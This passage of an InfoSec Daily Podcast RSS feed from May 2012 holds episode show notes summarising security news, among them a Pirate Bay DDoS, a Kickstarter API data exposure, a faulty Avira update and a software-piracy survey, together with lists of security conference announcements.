<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a </span><a href="http://anonateam.tumblr.com/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">blog post</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the team responsible for the Virgin Media attack &#8211; AnonAteam &#8211; wrote that it had &quot;no involvement&quot; in the DDoS attack on The Pirate Bay.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;It is not a legitimate protest for anyone to be involved with nor does it fall within our objectives,&quot; AnonAteam said. &quot;Anyone involved in the attack should stop. It is our understanding Anonymous have no involvement in this attack.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Later in the day, The Pirate Bay said &quot;we KNOW that it is NOT Anonymous who is behind the ddos attack.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As </span><a href="http://torrentfreak.com/pirate-bay-under-ddos-attack-from-unknown-enemy-120516/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">noted by TorrentFreak</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, &quot;Pirate Bay downtime happens a handful of times each month, [but] it rarely persists for more than a few hours. When it goes beyond that the steady flow of reader emails to TorrentFreak quickly transforms itself into a torrent.&quot;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Alternate Sites: &nbsp;</span><a href="http://pastebin.com/JVGDat6v"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pastebin.com/JVGDat6v</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://threatpost.com/en_us/blogs/kickstarter-data-breach-publishes-70000-startup-ideas-051512"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/kickstarter-data-breach-publishes-70000-startup-ideas-051512</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An application programming interface (API) error on the popular Kickstarter crowdfunding website exposed the plans and descriptions of more than 70,000 yet-to-be launched projects.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The API bug exposed project descriptions, goals, durations, rewards, videos, images, locations, categories, and usernames for unlaunched projects.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In </span><a href="http://www.kickstarter.com/blog/kickstarter-api-bug"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">a statement</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, Kickstarter said that no account or financial data of any kind was made accessible by the exposure.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It is unlikely that casual users came into contact with any of the unlaunched project data, the company claims, because of the way the API was indexed on the site.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;For those who are unfamiliar, an API is a software interface that allows software to communicate with one another,&rdquo; reads the statement. &quot;It&#39;s not like a webpage that an internet user could point their browser to. It is a feed of data meant to be shared between software. The API in this instance is for Kickstarter&#39;s internal use.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The bug was initially introduced during a site upgrade on April 24. It remained live until it was discovered and fixed at 1:42 PM Friday, May 11.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The company apologized in their statement, calling the bug &quot;completely unacceptable.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Wall Street Journal </span><a href="http://online.wsj.com/article_email/SB10001424052702304371504577402531319165366-lMyQjAxMTAyMDEwMzExNDMyWj.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">reported</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that Amazon Payments handles all of Kickstarters pledges and that the company never even sees user credit card or other billing information.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kickstarter had to pull a video game start-up off the site earlier this month when it became clear that the project was a scam.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.net-security.org/secworld.php?id=12935"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.net-security.org/secworld.php?id=12935</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you are a user of any of the paid versions of Avira&#39;s various antivirus and security software and you have tried to update it/them in the last 24 hours, chances are that you&#39;re now sitting before a crippled PC, wondering what happened.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">So what did happen? </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Well, it seems that the new update makes the AntiVirProActiv component &#8211; not present only in the company&#39;s free offering &#8211; erroneously detect critical Windows processes as malware and automatically terminate them.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It also blocks other popular Microsoft and third party software, and sometimes even prevents Windows from booting at all.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It is unknown how many individuals and businesses were affected by the defective update but, according to </span><a href="http://www.zdnet.com/blog/security/avira-antivirus-update-cripples-millions-of-windows-pcs/12129"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Emil Protalinski</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, it seems to have been downloaded millions of times.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Avira&#39;s forums are heaving with users searching for a way to undo the damage, and the company is furiously working on a solution. </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">So far, they </span><a href="http://www.avira.com/en/support-for-home-knowledgebase-detail/kbid/1257"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">advise</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> users to either temporarily disable the ProActiv component or to add an exception for every blocked application.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For those who can boot Windows only in safe mode, disabling ProActiv requires bringing up the Task Manager, opening a new task and typing &ldquo;c:\program files\avira\antivir desktop\avconfig.exe&rdquo;, then running it.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.infoworld.com/d/the-industry-standard/pc-users-admit-pirating-software-193218"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/d/the-industry-standard/pc-users-admit-pirating-software-193218</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">More than half of global PC users admit that they pirate software at least occasionally, contributing to a black-market economy estimated at $63.4 billion in 2011, up from $58.8 billion the previous year, according to a new survey from the </span><a href="http://www.bsa.org/country.aspx?sc_lang=en"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Business Software Alliance</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The trade group, a leading advocate for stronger intellectual property rules and stricter enforcement practices, for the first time directly asked survey respondents how often they acquire pirated or not fully licensed software in its 2011 Global Software Piracy Study, the ninth installment of the annual report.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Of the 57 percent of survey participants who admitted to using illegal copies of software, 5 percent said they always use pirated software, 9 percent answered &quot;mostly,&quot; 17 percent &quot;occasionally,&quot; and 26 percent said they &quot;rarely&quot; do. Thirty-eight percent said they never install pirated software, while the remaining 5 percent said they didn&#39;t know or declined to answer.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;If 57 percent of consumers admitted they shoplift, authorities would react by increasing police patrols and penalties,&quot; Robert Holleyman, president and CEO of the BSA, said in a statement. &quot;Software piracy demands a similarly forceful response &#8212; concerted public education and vigorous law enforcement.&quot;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The report pegged the overall global piracy rate at 42 percent, roughly the same as the 2010 mark, with much of that activity driven by surging PC usage in emerging markets, where BSA says piracy rates are considerably higher than in developed countries. Emerging countries received 56 percent of PC shipments last year, according to the BSA. In aggregate, users in emerging markets reported a piracy rate of 68 percent, compared to the average figure of 24 percent in mature markets.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[end]</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-669-wikimalware-the-heart-wants-piratebay-ddos-kickstarter-avira-headache-and-piracy/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3940/0/infosec-daily-podcast-episode-669.mp3" length="19680490" type="audio/mpeg" />
		<itunes:duration>0:41:00</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 669 for May 16, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, &#160;Dr B0n3z, and Karthik Rangarajan.
&#160;
Announcements
EFF DEFCONtest
https://supporters.eff.org/civicrm/pcp/info?reset=1[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 669 for May 16, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, &#160;Dr B0n3z, and Karthik Rangarajan.
&#160;
Announcements
EFF DEFCONtest
https://supporters.eff.org/civicrm/pcp/info?reset=1&#38;id=42&#38;ap=1
&#160;
GraniteSec (formerly The New England InfoSec Tweetup)
	When: &#160;May 19, 2012&#160;&#160;&#160; 
	Where: &#160;Veasey Memorial Park, Groveland, MA
	http://granitesec.org
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
	When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: November 12-16, 2012
	Where: &#160;Bristol, UK
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html

DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Hack3rCon^3
When: October 19-21, 2012
Where: Charleston, WV 
	http://hack3rcon.org/ 
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Hacker Wars &#8212; The Movie
Ever wanted to participate in Live action Capture the Flag? Well here is your chance
What: This contest is modeled on so-called &#34;penetration tests&#34; which is when ethical hackers attempt to break in to a company&#39;s computer systems with the target&#39;s permission. &#160;This is in an effort to find security problems before the bad guys do. &#160;The contest won&#39;t just involve sitting at computers, it will also involve other typical activities: performing reconnaissance of physical facilities, surveillance of individuals, urban exploration, infiltration of buildings, and surreptitious contact with moles in the target organization.
http://www.kickstarter.com/projects/278183749/hacker-wars
&#160;
Stories
Source: &#160;http://www.infoworld.com/d/the-industry-standard/pc-users-admit-pirating-software-193218
Visitors to Wikipedia who see advertisements on the site have most likely fallen victim to a browser-based malware infection, Wikimedia Foundation, the organization operating the website, said on Monday.
&#34;We never run ads on Wikipedia,&#34; said Philippe Beaudette, director of community advocacy for the Wikimedia Foundation, in a blog post. &#34;If you&#39;re seeing advertisements for a for-profit industry &#8230; or anything but our fundraiser, then your web browser has likely been infected with malware.&#34;
One example of such malware is a rogue Google Chrome extension called &#34;I want this,&#34; Beaudette said. However, similar malicious add-ons might also exist for Mozilla Firefox, Internet Explorer, and other browsers, he said.
This type of malicious software is known as click fraud malware and can target multiple websites at once. In addition to injecting ads into Web pages, such rogue extensions are also known to hijack search queries in order to earn their creators affiliate revenue, said Graham Cluley, a senior technology consultant at Sophos, in a blog post Tuesday.
Spotting this type of rogue behavior on Wikipedia is easier than on other websites because the site doesn&#39;t run any commercial advertisements. &#34;We&#39;re here to distribute the sum of human knowledge to everyone on the planet &#8212; ad-free, forever,&#34; Beaudette said.
Wikipedia&#39;s operating costs are covered by donations. An onli[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 668 &#8211;  CSIS report, Leopard Update, Analyzing OS X, Shiqiang Gang, Nice backdoor &amp; th3j35t3r unmasked?</title>
		<link>http://www.isdpodcast.com/episode-668-csis-report-leopard-update-analyzing-os-x-shiqiang-gang-nice-backdoor-th3j35t3r-unmasked</link>
		<comments>http://www.isdpodcast.com/episode-668-csis-report-leopard-update-analyzing-os-x-shiqiang-gang-nice-backdoor-th3j35t3r-unmasked#comments</comments>
		<pubDate>Wed, 16 May 2012 01:09:19 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3938</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 668 for May 15, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Themson Mester, Karthik Rangarajan, and Dr B0n3z. &#160; Announcements EFF DEFCONtest https://supporters.eff.org/civicrm/pcp/info?reset=1&#38;id=42&#38;ap=1 &#160; GraniteSec (formerly The New England InfoSec Tweetup) When: &#160;May 19, 2012&#160;&#160;&#160; Where: &#160;Veasey Memorial Park, Groveland, MA http://granitesec.org &#160; AIDE 2012 When: [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" id="internal-source-marker_0.8596010055127269" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 668 for May 15, 2012. &nbsp;</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Themson Mester, Karthik Rangarajan, and Dr B0n3z.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Announcements</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">EFF DEFCONtest</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="https://supporters.eff.org/civicrm/pcp/info?reset=1&amp;id=42&amp;ap=1"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://supporters.eff.org/civicrm/pcp/info?reset=1&amp;id=42&amp;ap=1</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">GraniteSec (formerly The New England InfoSec Tweetup)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;May 19, 2012&nbsp;&nbsp;&nbsp; <br class="kix-line-break" /><br />
	Where: &nbsp;Veasey Memorial Park, Groveland, MA<br class="kix-line-break" /><br />
	</span><a href="http://granitesec.org"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://granitesec.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA <br class="kix-line-break" /><br />
	</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD<br class="kix-line-break" /><br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
